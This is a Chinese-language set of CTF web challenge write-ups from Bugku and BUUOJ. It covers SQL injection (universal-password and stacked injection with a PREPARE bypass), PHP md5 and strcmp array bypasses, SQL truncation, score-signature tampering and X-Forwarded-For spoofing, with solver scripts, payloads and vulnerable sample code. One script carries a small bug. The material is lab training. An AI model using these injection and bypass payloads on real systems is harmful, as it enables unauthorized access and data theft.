web1

Bugku-秋名山车神

快速反弹 POST 请求，因为精度问题需要多次尝试

import requests
import re
url = 'http://114.67.246.176:17516/'
s = requests.Session()
source = s.get(url)
expression = re.search(r'(\d+[+\-*])+(\d+)', source.text).group()
result = eval(expression)
post = {'value': result}
print(s.post(url, data = post).text)

Bugku-速度要快

查看源代码，需要post对应margin，bp抓包发现回应报文头有flag，采用base64解码2次

# python = 2.7
import base64
import requests

url = 'http://114.67.246.176:11932'
req = requests.Session()
source = req.get(url)
data1 = base64.b64decode(source.headers['flag'])
print(data1)
data1 = data1 [data1.index(":")+2:]
print(data1)
data = base64.b64decode(data1)
print(data)
post = {"margin":data}
ans = s.post(url,post)
print ans.content

BUUOJ-[极客大挑战 2019]EasySQL1

一般的验证语句为sql="select * from admin where username="&user&" and password="&pwd&""
尝试万能密码 username=1'or 1=1#&password=1
账号中的’使前面的引号闭合，or 1=1 使语句恒成立，最后的#号会注释掉#之后的语句，避免报错.
check.php?username=1%27or%201=1%23&password=1

BugKu game1

bp抓包

GET /score.php?score=25&ip=106.39.42.143&sign=zMMjU=== HTTP/1.1
Host: 114.67.246.176:11523
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: */*
Referer: http://114.67.246.176:11523/?s=1631061774862
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.1016401715.1631061825; _gid=GA1.1.1665857216.1631061825; Hm_lvt_c1b044f909411ac4213045f0478e96fc=1631061825; _gat=1; Hm_lpvt_c1b044f909411ac4213045f0478e96fc=1631062078
Connection: close

考虑score和sign之间的关系，第一时间对sign进行base64解密，发现不正确 ̃#

对score加密 MjU=

发现属于是base64加上首部和尾部

替换较大分数并按照以上添加首尾部即可

GET /score.php?score=4000&ip=106.39.42.143&sign=zMNDAwMA==== HTTP/1.1
Host: 114.67.246.176:11523
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: */*
Referer: http://114.67.246.176:11523/?s=1631061774862?s=1631062331778
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.1016401715.1631061825; _gid=GA1.1.1665857216.1631061825; Hm_lvt_c1b044f909411ac4213045f0478e96fc=1631061825; _gat=1; Hm_lpvt_c1b044f909411ac4213045f0478e96fc=1631062340
Connection: close

Bugku-前女友（php绕过）

弱类型比较

• ===: 在进行比较的时候，会先判断两种字符串的类型是否相等，再比较，03开头的字符串结果为0
• ==: 在进行比较的时候，会先将字符串类型转化成相同，再比较，如果比较的是一个字符串和一个数字，则字符串会被转化为数值。

<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
        if(!strcmp($v3, $flag)){
            echo $flag;
        }
    }
}
?>

http://114.67.246.176:11128/?v1=240610708&v2=QNKCDZO&v3[]=1

利用md5()函数的特点。 md5()函数加密一个数组时会报错，返回null。 因此，只要另$v1，$v2为两个值不同的数组即可绕过。

http://114.67.246.176:11128/?v1[]=240610708&v2[]=QNKCDZO&v3[]=1

strcmp()函数用来判断两个字符串是否相等，若相等，返回0。php在5.3版本之前若传入的是一个非字符串类型数据，比如数组和对象，则会报错，但在报错的同时会返回0。

Bugku1-login1

sql约束攻击，参考https://www.k0rz3n.com/2017/06/03/passsignup/

<?php
// Checking whether a user with the same username exists
$username = mysql_real_escape_string($_GET['username']);
$password = mysql_real_escape_string($_GET['password']);
$query = "SELECT *
          FROM users
          WHERE username='$username'";
$res = mysql_query($query, $database);
if($res) {
  if(mysql_num_rows($res) > 0) {
    // User exists, exit gracefully
    .
    .
  }
  else {
    // If not, only then insert a new entry
    $query = "INSERT INTO users(username, password)
              VALUES ('$username','$password')";
    .
    .
  }
}

<?php
$username = mysql_real_escape_string($_GET['username']);
$password = mysql_real_escape_string($_GET['password']);
$query = "SELECT username FROM users
          WHERE username='$username'
              AND password='$password' ";
$res = mysql_query($query, $database);
if($res) {
  if(mysql_num_rows($res) > 0){
      $row = mysql_fetch_assoc($res);
      return $row['username'];
  }
}
return Null;

在SQL中执行字符串处理时，字符串末尾的空格符将会被删除。换句话说“vampire”等同于“vampire ”，对于绝大多数情况来说都是成立的（诸如WHERE子句中的字符串或INSERT语句中的字符串）。

BUUOJ-[极客大挑战 2019]Havefun1

<!--
$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
    echo 'Syc{cat_cat_cat_cat}';
}
-->

BUUOJ-[强网杯 2019]随便注1

# ‘1 or 1=1 #
array(2) {
  [0]=>
  string(1) "1"
  [1]=>
  string(7) "hahahah"
}

array(2) {
  [0]=>
  string(1) "2"
  [1]=>
  string(12) "miaomiaomiao"
}

array(2) {
  [0]=>
  string(6) "114514"
  [1]=>
  string(2) "ys"
}
# 0';show databases; 堆叠注入，查看库名
array(1) {
  [0]=>
  string(11) "ctftraining"
}

array(1) {
  [0]=>
  string(18) "information_schema"
}

array(1) {
  [0]=>
  string(5) "mysql"
}

array(1) {
  [0]=>
  string(18) "performance_schema"
}

array(1) {
  [0]=>
  string(9) "supersqli"
}

array(1) {
  [0]=>
  string(4) "test"
}

1';PREPARE hacker from concat('s','elect', ' * from `1919810931114514` ');EXECUTE hacker;#

robots协议

robots.txt文件是一个文本文件，使用任何一个常见的文本编辑器，比如Windows系统自带的Notepad，就可以创建和编辑它 [1] 。robots.txt是一个协议，而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt文件告诉蜘蛛程序在服务器上什么文件是可以被查看的。

伪造代理

GET / HTTP/1.1
Host: 111.200.241.244:49662
Upgrade-Insecure-Requests: 1

X-Forwarded-For:123.123.123.123 # fake ip
Referer:https://www.google.com

Content-Length: 360
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close